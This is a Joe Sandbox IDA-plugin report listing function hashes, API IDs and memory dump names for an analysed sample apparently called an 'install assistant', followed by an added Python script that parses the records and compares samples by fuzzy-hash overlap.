                                            • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                            • Instruction Fuzzy Hash: 8041C170C0128AAFCF14DFA0D6988EEB774AF15308F21C06AD12167A51EB31B64DCB41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: __aulldiv
                                            • String ID:
                                            • API String ID: 3732870572-0
                                            • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                            • Instruction ID: 6522a300293a92f162f641efc6b27396f4b17350b93cdef57c84d4c7ccb93fad
                                            • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                            • Instruction Fuzzy Hash: 19119D76200204BFEB254AA5CD84EAFBBBEEB85748F10C82DF54196A90D6B1BC559720
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7BE077
                                              • Part of subcall function 6C7BDFF5: __EH_prolog.LIBCMT ref: 6C7BDFFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: :$\
                                            • API String ID: 3519838083-1166558509
                                            • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                            • Instruction ID: c25d0932ece5b202c3090257067d0b122930941ac56afff07a446975ec565705
                                            • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                            • Instruction Fuzzy Hash: C2E1F23090060D9ACF14DFA4CB9CBEDB7B1AF1531CF2081A9E86577B90EB74A549CB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: @$hfJ
                                            • API String ID: 3519838083-1391159562
                                            • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                            • Instruction ID: 2ce6ffade83c592f0510e63eef5da7d84d59c26f18293eb3a4a45fb4d8cc403c
                                            • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                            • Instruction Fuzzy Hash: 85916B71910649EFCB10DF99CA889DEFBF4FF18308F54452EE155A7AA0D770AA48CB11
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7D8C5D
                                              • Part of subcall function 6C7D761A: __EH_prolog.LIBCMT ref: 6C7D761F
                                              • Part of subcall function 6C7D7A2E: __EH_prolog.LIBCMT ref: 6C7D7A33
                                              • Part of subcall function 6C7D8EA5: __EH_prolog.LIBCMT ref: 6C7D8EAA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: WZJ
                                            • API String ID: 3519838083-1089469559
                                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                            • Instruction ID: bc43612ae5e3126c9dd83f429235550bf39fd6dbd642be6298cca1708052c5d9
                                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                            • Instruction Fuzzy Hash: C1819131D00159DFCF15DFA8DA98ADDBBB4AF18318F1140AAE51677790DB30AE09CBA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog__aullrem
                                            • String ID: d%K
                                            • API String ID: 3415659256-3110269457
                                            • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                            • Instruction ID: 4e998cd76cfa5131dae52b3f7612fc390345eb6f566294ba9488238ded108a87
                                            • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                            • Instruction Fuzzy Hash: E561C072B016099FDF21CFA4CA847EE77F1BF48309F248858D854AB681D771D905CBA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: CK$CK
                                            • API String ID: 3519838083-2096518401
                                            • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                            • Instruction ID: e77d729e263f4ef2c78a98bd65c5c57366d212611e137f1c27f06b8cfa516802
                                            • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                            • Instruction Fuzzy Hash: 2751AF75B003059FDB20CFA8C9C0AEEB3B5FF89359F148929D911EB741DB74A9458B60
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: PdJ$Q
                                            • API String ID: 3519838083-3674001488
                                            • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                            • Instruction ID: a539a92307f5cc5d90df9130a5dce8bb778f16a2b51615ff5d55f82e5b550661
                                            • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                            • Instruction Fuzzy Hash: 6941CD72D00645DBCF10DFA8C6949DDB3B4FF4D358B10C12AE925BBA40CB319A45DB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: 0|J$`)L
                                            • API String ID: 3519838083-117937767
                                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                            • Instruction ID: bc710a19558a8698c80fd95342f8d723794db83747501c3073e181f347be8604
                                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                            • Instruction Fuzzy Hash: 9841C231604785EFCB119F64C698BEEBBF2FF55208F00442EE16A97750CB316805DB62
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: __aulldiv
                                            • String ID: 3333
                                            • API String ID: 3732870572-2924271548
                                            • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                            • Instruction ID: e8af3a92927297ef67972ff4bee75890b208953332a952e4fba0441e5b4ba49e
                                            • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                            • Instruction Fuzzy Hash: BD2183B0A007046FE7308FB98981B6BBAFDEB84754F50CD3EA186D7B40D770A9458B65
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: @$LuJ
                                            • API String ID: 3519838083-205571748
                                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                            • Instruction ID: 39752bc3a9b55a10d06788a32c0952bcb4334c16a8c58de5e395c182f206ce36
                                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                            • Instruction Fuzzy Hash: B801ADB2E0124ADADB10DFA985805AEFBB4FF59304F80842EE029E3B40D3745905CB99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: @$xMJ
                                            • API String ID: 3519838083-951924499
                                            • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                            • Instruction ID: 1e4427c044bea5a2fae6d529ea64026d3b9f18c648e5c33727d9f6d91cc7a0fb
                                            • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                            • Instruction Fuzzy Hash: 9C117CB1E0024ADFCB00DF9AC59459EB7B4FF18388B50C82ED469E7700D3389A45CB96
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: p/K$J
                                            • API String ID: 3519838083-2069324279
                                            • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                            • Instruction ID: 62d54dad7db768c6818cda5f5d18d56092e20199d1e55353bb32f4d79463d753
                                            • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                            • Instruction Fuzzy Hash: 5B019AB2A117119FD724CF58C6083AAB7F4EB54729F10C82E9056A3B40C7F8A9088BA4
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7FAFCC
                                              • Part of subcall function 6C7FA4D1: __EH_prolog.LIBCMT ref: 6C7FA4D6
                                              • Part of subcall function 6C7F914B: __EH_prolog.LIBCMT ref: 6C7F9150
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: J$0J
                                            • API String ID: 3519838083-2882003284
                                            • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                            • Instruction ID: be11a63ed073062fc919745786fe14c982b2822af5c951b1708ca667d9dd6e60
                                            • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                            • Instruction Fuzzy Hash: E501C5B1804B51CFC325CF59C5A869AFBE0BB15744F90CD6EC0A657B50D7B8A508CB68
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7F43F9
                                              • Part of subcall function 6C7F4320: __EH_prolog.LIBCMT ref: 6C7F4325
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: `)L$|{J
                                            • API String ID: 3519838083-2198066115
                                            • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                            • Instruction ID: ad4d0c4c83c16f82b750e26b4e0a811e6076e8af8ce2b30084bfef4d184df4b9
                                            • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                            • Instruction Fuzzy Hash: 92F08C72A10014FFCB059F94DE48BDEBBB9FF49314F00802AF915A6660CBF56A15DB98
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prologctype
                                            • String ID: <oJ
                                            • API String ID: 3037903784-2791053824
                                            • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                            • Instruction ID: c96f95abe485ba80e2d93c7160a4b411071b93fe28e9235014f010526c28f8be
                                            • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                            • Instruction Fuzzy Hash: FBE06D32A155119BDB189F4CDA24BDEFBB8EF597A4F11412EE021A7B91CBB1A8108684
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D)K$H)K$P)K$T)K
                                            • API String ID: 0-2262112463
                                            • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                            • Instruction ID: ef5cf17ff5f12a1560989f16a861b9709580d33343f2b2d273d84cbdfb04b80f
                                            • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                            • Instruction Fuzzy Hash: BC51B33190820A9BCF15DF94DA48ADEB7F1EFA532CF10881AE82177F90DB769948C751
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (?K$8?K$H?K$CK
                                            • API String ID: 0-3450752836
                                            • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                            • Instruction ID: 5d31b539851382af781584fc4ea49fd73e6e1b514b992404e4c37495bf79e2f8
                                            • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                            • Instruction Fuzzy Hash: C2F017B06017009EC3608F46D64869BBBF4AB4170AF50DD1EE49A9BA40D3B9A5088FA8
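The function records above (memory dump source, opcode and instruction fuzzy hashes, API and string IDs) are what an analyst pulls out of a Joe Sandbox report to cluster a sample against other builds of the same family. The following Python is an added example, not part of the report and not Joe Sandbox code: it parses a few of the records copied from this section into structured data, strips the "Download File" link text that the page extraction glued onto the dump names, and computes the Jaccard overlap of opcode fuzzy hashes between two record sets. The field names are the ones printed on the page; the rule that a new record starts at each "Memory Dump Source" header, and the dot-separated split of the .sdmp name, are assumptions inferred from the layout shown here.

```python
"""Parse Joe Sandbox IDA-plugin function records and compare samples by fuzzy hash."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed input: three records copied from the report section above, with the
# "Download File" link text the page extraction left on the Associated lines.
SAMPLE = """\
• Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
• Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID: H_prolog
• String ID: J$0J
• API String ID: 3519838083-2882003284
• Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
• Instruction ID: be11a63ed073062fc919745786fe14c982b2822af5c951b1708ca667d9dd6e60
• Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
• Instruction Fuzzy Hash: E501C5B1804B51CFC325CF59C5A869AFBE0BB15744F90CD6EC0A657B50D7B8A508CB68
APIs
• __EH_prolog.LIBCMT ref: 6C7F43F9
  • Part of subcall function 6C7F4320: __EH_prolog.LIBCMT ref: 6C7F4325
Strings
Memory Dump Source
• Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
Similarity
• API ID: H_prolog
• String ID: `)L$|{J
• Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
Similarity
• API ID: H_prologctype
• Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
• Instruction Fuzzy Hash: FBE06D32A155119BDB189F4CDA24BDEFBB8EF597A4F11412EE021A7B91CBB1A8108684
"""

FIELD_MAP = {  # bullet label on the page -> attribute name
    "Snapshot File": "snapshot_file", "API ID": "api_id", "String ID": "string_id",
    "API String ID": "api_string_id", "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
    "Opcode Fuzzy Hash": "opcode_fuzzy_hash", "Instruction Fuzzy Hash": "instruction_fuzzy_hash",
}
API_REF_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?(\S+)\s+ref:\s*([0-9A-Fa-f]+)$")
LINK_RESIDUE = "Download File"  # interactive-page text glued onto dump names


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: Optional[int] = None
    based_on_pe: bool = False
    associated: List[str] = field(default_factory=list)
    snapshot_file: str = ""
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""
    apis: List[Tuple[str, int, Optional[int]]] = field(default_factory=list)  # (api, ref, subcall parent)
    strings: List[str] = field(default_factory=list)


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    rec: Optional[FunctionRecord] = None
    section = None  # None, "APIs" or "Strings"
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(LINK_RESIDUE):
            line = line[: -len(LINK_RESIDUE)].rstrip()
        # Assumption: a record starts at each "Memory Dump Source" header, or at a
        # leading "Source File" bullet when the text begins mid-record as above.
        if line == "Memory Dump Source" or (rec is None and line.startswith("• Source File:")):
            rec = FunctionRecord()
            records.append(rec)
            section = None
            if line == "Memory Dump Source":
                continue
        if rec is None or not line:
            continue
        if line in ("APIs", "Strings"):
            section = line
            continue
        if line in ("Joe Sandbox IDA Plugin", "Similarity"):
            section = None
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_REF_RE.match(body)
            if m:
                parent = int(m.group(1), 16) if m.group(1) else None
                rec.apis.append((m.group(2), int(m.group(3), 16), parent))
        elif section == "Strings":
            rec.strings.append(body)
        else:
            key, _, value = body.partition(":")
            key, value = key.strip(), value.strip()
            if key == "Associated":
                rec.associated.append(value)
            elif key == "Source File":  # "<name>, Offset: <hex>, based on PE: <bool>"
                name, _, rest = value.partition(",")
                rec.source_file = name.strip()
                off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
                rec.offset = int(off.group(1), 16) if off else None
                rec.based_on_pe = "based on PE: true" in rest
            elif key in FIELD_MAP:
                setattr(rec, FIELD_MAP[key], value)
    return records


def split_dump_name(name: str) -> List[str]:
    """Split an .sdmp name into its dot-separated fields (assumed layout); the fourth
    field is the region base and matches the record's Offset on this page."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    return stem.split(".")


def shared_function_ratio(a, b, key: str = "opcode_fuzzy_hash") -> float:
    """Jaccard overlap of one fuzzy-hash field between two record sets."""
    sa = {getattr(r, key) for r in a if getattr(r, key)}
    sb = {getattr(r, key) for r in b if getattr(r, key)}
    return len(sa & sb) / len(sa | sb) if (sa | sb) else 0.0


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(hex(r.offset), r.api_id or "-", r.opcode_fuzzy_hash[:16], r.apis)
    print("overlap:", shared_function_ratio(recs[:2], recs[1:]))
```

Run against a full report the overlap is computed per sample rather than per record slice: parse this report and a second one, then call shared_function_ratio on the two lists. Note that the parser deliberately leaves values such as the "H_prologctype" API ID exactly as printed, since the page gives no separator to split on.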